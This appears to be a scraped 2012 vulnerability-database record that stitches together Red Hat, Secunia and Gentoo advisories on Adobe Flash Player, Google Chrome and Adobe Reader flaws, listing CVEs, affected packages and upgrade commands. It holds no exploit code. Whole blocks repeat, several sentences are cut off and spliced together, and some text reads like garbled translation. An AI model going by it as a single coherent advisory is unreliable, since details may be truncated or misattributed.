Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. These
vulnerabilities are detailed on the Adobe security page APSB12-03, listed
in the References section.
Multiple security flaws were found in the way flash-plugin displayed
certain SWF content. An attacker could use these flaws to create a
specially-crafted SWF file that would cause flash-plugin to crash or,
potentially, execute arbitrary code when the victim loaded a page
containing the specially-crafted SWF content. (CVE-2012-0752,
CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756)
A flaw in flash-plugin could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03)
791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-0752.html
https://www.redhat.com/security/data/cve/CVE-2012-0753.html
https://www.redhat.com/security/data/cve/CVE-2012-0754.html
https://www.redhat.com/security/data/cve/CVE-2012-0755.html
https://www.redhat.com/security/data/cve/CVE-2012-0756.html
https://www.redhat.com/security/data/cve/CVE-2012-0767.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-03.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq
2hfvaUbJyuTg8og5n/gSdGc=
=7NQZ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA48265
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48265/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
RELEASE DATE:
2012-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/48265/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48265/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Google Chrome, where one
has an unknown impact and others can be exploited by malicious people
to conduct cross-site scripting attacks, bypass certain security
restrictions, and compromise a user's system.
1) A use-after-free error exists within v8 element wrapper handling.
2) A use-after-free error exists within SVG value handling.
3) A buffer overflow exists within the Skia drawing library.
4) A use-after-free error exists within SVG document handling.
5) A use-after-free error exists within SVG use handling.
6) A casting error exists within line box handling.
7) A casting error exists within anonymous block splitting.
8) A use-after-free error exists within multi-column handling.
9) A use-after-free error exists within quote handling.
10) An out-of-bounds read error exists within text handling.
11) A use-after-free error exists within class attribute handling.
12) A use-after-free error exists within table section handling.
13) A use-after-free error exists within flexbox with floats
handling.
14) A use-after-free error exists within SVG animation elements
handling.
For more information:
SA48033
SOLUTION:
Update to version 17.0.963.65.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Chamal de Silva
2, 4, 5, 14) Arthur Gerkis
3) Aki Helin, OUSPG
6, 7, 8, 9, 10, 11, 12, 13) miaubiz
ORIGINAL ADVISORY:
http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228"
References
==========
[ 1 ] CVE-2011-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445
[ 2 ] CVE-2011-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450
[ 3 ] CVE-2011-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451
[ 4 ] CVE-2011-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452
[ 5 ] CVE-2011-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453
[ 6 ] CVE-2011-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454
[ 7 ] CVE-2011-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455
[ 8 ] CVE-2011-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456
[ 9 ] CVE-2011-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457
[ 10 ] CVE-2011-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458
[ 11 ] CVE-2011-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459
[ 12 ] CVE-2011-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460
[ 13 ] CVE-2012-0752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752
[ 14 ] CVE-2012-0753
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753
[ 15 ] CVE-2012-0754
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754
[ 16 ] CVE-2012-0755
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755
[ 17 ] CVE-2012-0756
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756
[ 18 ] CVE-2012-0767
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767
[ 19 ] CVE-2012-0768
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768
[ 20 ] CVE-2012-0769
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769
[ 21 ] CVE-2012-0773
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201204-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817.
1) An unspecified error in an ActiveX Control can be exploited to
corrupt memory.
2) A type confusion error can be exploited to corrupt memory.
3) An unspecified error related to MP4 parsing can be exploited to
corrupt memory.
4) An unspecified error can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities #1 through #6 may
allow execution of arbitrary code.
7) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
conduct cross-site scripting attacks, gain knowledge of potentially
sensitive information, bypass certain security restrictions, and
compromise a user's system
VAR-201202-0174 | CVE-2012-0767 | Adobe Flash Player Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)," as exploited in the wild in February 2012. Adobe Flash Player Contains a cross-site scripting vulnerability.By any third party Web Script or HTML May be inserted.
An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The product enables viewing of applications, content and video across screens and browsers. Remote attackers can use this vulnerability to inject arbitrary web scripts or HTML with unknown vectors, also known as \"Universal XSS (UXSS)\". -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2012:0144-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html
Issue date: 2012-02-17
CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754
CVE-2012-0755 CVE-2012-0756 CVE-2012-0767
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3.
This update fixes multiple vulnerabilities in Adobe Flash Player. These
vulnerabilities are detailed on the Adobe security page APSB12-03, listed
in the References section.
Multiple security flaws were found in the way flash-plugin displayed
certain SWF content. An attacker could use these flaws to create a
specially-crafted SWF file that would cause flash-plugin to crash or,
potentially, execute arbitrary code when the victim loaded a page
containing the specially-crafted SWF content. (CVE-2012-0752,
CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756)
A flaw in flash-plugin could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2012-0767)
All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 10.3.183.15.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03)
791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-0752.html
https://www.redhat.com/security/data/cve/CVE-2012-0753.html
https://www.redhat.com/security/data/cve/CVE-2012-0754.html
https://www.redhat.com/security/data/cve/CVE-2012-0755.html
https://www.redhat.com/security/data/cve/CVE-2012-0756.html
https://www.redhat.com/security/data/cve/CVE-2012-0767.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-03.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq
2hfvaUbJyuTg8og5n/gSdGc=
=7NQZ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA48265
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48265/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
RELEASE DATE:
2012-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/48265/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48265/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Google Chrome, where one
has an unknown impact and others can be exploited by malicious people
to conduct cross-site scripting attacks, bypass certain security
restrictions, and compromise a user's system.
1) A use-after-free error exists within v8 element wrapper handling.
2) A use-after-free error exists within SVG value handling.
3) A buffer overflow exists within the Skia drawing library.
4) A use-after-free error exists within SVG document handling.
5) A use-after-free error exists within SVG use handling.
6) A casting error exists within line box handling.
7) A casting error exists within anonymous block splitting.
8) A use-after-free error exists within multi-column handling.
9) A use-after-free error exists within quote handling.
10) An out-of-bounds read error exists within text handling.
11) A use-after-free error exists within class attribute handling.
12) A use-after-free error exists within table section handling.
13) A use-after-free error exists within flexbox with floats
handling.
14) A use-after-free error exists within SVG animation elements
handling.
For more information:
SA48033
SOLUTION:
Update to version 17.0.963.65.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Chamal de Silva
2, 4, 5, 14) Arthur Gerkis
3) Aki Helin, OUSPG
6, 7, 8, 9, 10, 11, 12, 13) miaubiz
ORIGINAL ADVISORY:
http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Furthermore, a remote attacker may be able to bypass intended access
restrictions, bypass cross-domain policy, inject arbitrary web script,
or obtain sensitive information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228"
References
==========
[ 1 ] CVE-2011-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445
[ 2 ] CVE-2011-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450
[ 3 ] CVE-2011-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451
[ 4 ] CVE-2011-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452
[ 5 ] CVE-2011-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453
[ 6 ] CVE-2011-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454
[ 7 ] CVE-2011-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455
[ 8 ] CVE-2011-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456
[ 9 ] CVE-2011-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457
[ 10 ] CVE-2011-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458
[ 11 ] CVE-2011-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459
[ 12 ] CVE-2011-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460
[ 13 ] CVE-2012-0752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752
[ 14 ] CVE-2012-0753
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753
[ 15 ] CVE-2012-0754
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754
[ 16 ] CVE-2012-0755
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755
[ 17 ] CVE-2012-0756
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756
[ 18 ] CVE-2012-0767
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767
[ 19 ] CVE-2012-0768
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768
[ 20 ] CVE-2012-0769
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769
[ 21 ] CVE-2012-0773
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201204-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817.
1) An unspecified error in an ActiveX Control can be exploited to
corrupt memory.
2) A type confusion error can be exploited to corrupt memory.
3) An unspecified error related to MP4 parsing can be exploited to
corrupt memory.
4) An unspecified error can be exploited to corrupt memory.
5) An unspecified error can be exploited to bypass certain security
restrictions.
6) An unspecified error can be exploited to bypass certain security
restrictions.
Successful exploitation of the vulnerabilities #1 through #6 may
allow execution of arbitrary code.
7) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
conduct cross-site scripting attacks, gain knowledge of potentially
sensitive information, bypass certain security restrictions, and
compromise a user's system
VAR-201112-0167 | CVE-2011-2462 | Adobe Acrobat and Reader U3D memory corruption vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Unspecified vulnerability in the U3D component in Adobe Reader and Acrobat 10.1.1 and earlier on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011. ( Memory corruption ) A state vulnerability exists.Arbitrary code execution or denial of service by a third party ( Memory corruption ) It may be in a state. Adobe Acrobat and Reader are prone to a remote memory corruption vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions. Acrobat is a series of products aimed at enterprises, technicians and creative professionals launched in 1993, making the transmission and collaboration of intelligent documents more flexible, reliable and secure. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2012:0011-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0011.html
Issue date: 2012-01-10
CVE Names: CVE-2011-2462 CVE-2011-4369
=====================================================================
1. Summary:
Updated acroread packages that fix two security issues are now available
for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise Linux 5 and 6
Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF). These flaws are
detailed on the Adobe security page APSB11-30, listed in the References
section. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.7-1.el4.i386.rpm
acroread-plugin-9.4.7-1.el4.i386.rpm
x86_64:
acroread-9.4.7-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.7-1.el4.i386.rpm
acroread-plugin-9.4.7-1.el4.i386.rpm
x86_64:
acroread-9.4.7-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.7-1.el4.i386.rpm
acroread-plugin-9.4.7-1.el4.i386.rpm
x86_64:
acroread-9.4.7-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.7-1.el4.i386.rpm
acroread-plugin-9.4.7-1.el4.i386.rpm
x86_64:
acroread-9.4.7-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.7-1.el5.i386.rpm
acroread-plugin-9.4.7-1.el5.i386.rpm
x86_64:
acroread-9.4.7-1.el5.i386.rpm
acroread-plugin-9.4.7-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.7-1.el5.i386.rpm
acroread-plugin-9.4.7-1.el5.i386.rpm
x86_64:
acroread-9.4.7-1.el5.i386.rpm
acroread-plugin-9.4.7-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.7-1.el6.i686.rpm
acroread-plugin-9.4.7-1.el6.i686.rpm
x86_64:
acroread-9.4.7-1.el6.i686.rpm
acroread-plugin-9.4.7-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.7-1.el6.i686.rpm
acroread-plugin-9.4.7-1.el6.i686.rpm
x86_64:
acroread-9.4.7-1.el6.i686.rpm
acroread-plugin-9.4.7-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.7-1.el6.i686.rpm
acroread-plugin-9.4.7-1.el6.i686.rpm
x86_64:
acroread-9.4.7-1.el6.i686.rpm
acroread-plugin-9.4.7-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2462.html
https://www.redhat.com/security/data/cve/CVE-2011-4369.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-30.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
